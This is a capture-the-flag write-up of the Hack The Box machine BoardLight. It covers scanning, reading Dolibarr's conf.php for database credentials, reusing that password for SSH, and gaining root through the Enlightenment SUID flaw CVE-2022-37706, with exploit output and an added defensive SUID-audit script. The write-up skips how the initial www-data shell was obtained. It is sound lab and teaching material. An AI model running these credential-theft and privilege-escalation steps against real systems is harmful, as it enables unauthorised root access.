This is a writeup of the machine BoardLight from HTB. It's an easy-difficulty Linux machine featuring web enumeration, credential hunting, and exploitation of a vulnerable SUID binary.
🔍 Enumeration
An initial nmap scan of the host gave the following results:
```
sudo nmap -sV -sC -Pn 10.10.11.11
Starting Nmap 7.80 ( https://nmap.org ) at 2024-09-10 09:08 EDT
Nmap scan report for 10.10.11.11
Host is up (0.033s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.64 seconds
```
There’s only web and SSH, so I started by checking out the site.
🌐 Web
The site isn't very interesting; there's a contact form we can play with, but it doesn't seem to do anything meaningful.
On the about page I noticed the WordPress logo, but after doing some digging this doesn’t seem to be a WordPress instance.
I decided to fuzz for directories; the only thing that stood out to me was /server-status.
From the www-data shell on the Dolibarr host, the installer-generated conf.php holds the database credentials in plain text:

```
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ cat conf.php
<?php
//
// File generated by Dolibarr installer 17.0.0 on May 13, 2024
//
// Take a look at conf.php.example file for an example of conf.php file
// and explanations for all possibles parameters.
//
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='[REDACTED]';
$dolibarr_main_db_type='mysqli';
$dolibarr_main_db_character_set='utf8';
$dolibarr_main_db_collation='utf8_unicode_ci';
// Authentication settings
$dolibarr_main_authentication='dolibarr';
[Removed for Brevity]
```
This gave us the MySQL login for Dolibarr. Checking the users on the machine, larissa and root are the only accounts with a login shell.

I tried the database password against larissa, and it worked: the credential was reused. I switched to SSH and grabbed the user flag.
🥇 Root
Now as larissa, I started by running LinPEAS; it flagged some SUID binaries that stuck out to me.
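As an added example (not from the original writeup, and not LinPEAS's own code), the same check done by hand: a POSIX shell snippet that lists setuid files under a directory and flags any whose name is not on a short allowlist of binaries expected to be setuid on a stock Ubuntu install. The allowlist is an assumption for illustration, not an authoritative baseline; on this box the entry that stands out is Enlightenment's enlightenment_sys helper.

```shell
#!/bin/sh
# Added example, not code from the original writeup or from LinPEAS.
# Lists setuid files under a directory and flags the ones not on an allowlist.

# Basenames expected to be setuid on a stock Ubuntu 20.04 install.
# This list is an assumption for illustration, not an authoritative baseline.
EXPECTED_SUID='sudo
su
passwd
chsh
chfn
gpasswd
newgrp
mount
umount
fusermount
pkexec'

# find_suid DIR: print setuid files under DIR (default /), one per line, sorted.
# -xdev keeps the walk on one filesystem; -perm -4000 matches the setuid bit.
find_suid() {
    find "${1:-/}" -xdev -type f -perm -4000 2>/dev/null | sort
}

# is_expected NAME: succeed if NAME is on the allowlist (exact, whole-line match).
is_expected() {
    printf '%s\n' "$EXPECTED_SUID" | grep -qxF -- "$1"
}

# unexpected_suid DIR: print setuid files under DIR whose basename is not
# on the allowlist. On BoardLight this is where enlightenment_sys shows up.
unexpected_suid() {
    find_suid "$1" | while IFS= read -r path; do
        if ! is_expected "$(basename "$path")"; then
            printf '%s\n' "$path"
        fi
    done
}

# Usage: SUID_SCAN_ROOT=/ sh suid_check.sh  (file name is hypothetical)
if [ -n "${SUID_SCAN_ROOT:-}" ]; then
    unexpected_suid "$SUID_SCAN_ROOT"
fi
```

Anything the scan prints deserves a closer look: check the package that owns it (`dpkg -S`), its version against known CVEs, and whether it actually needs the setuid bit at all.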
Enlightenment is a window manager, and searching for Enlightenment SUID led me to this exploit for CVE-2022-37706: enlightenment_sys, the setuid-root helper shipped with Enlightenment before 0.25.4, builds a mount command from a user-supplied path without properly sanitising it, and a path beginning with /dev/.. lets a local user smuggle in commands that run as root.

This took me a couple of tries to get working, but eventually I was able to use it to grab root on the machine.
```
larissa@boardlight:~$ ./exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# whoami
root
# cat /root/root.txt
[REDACTED]
```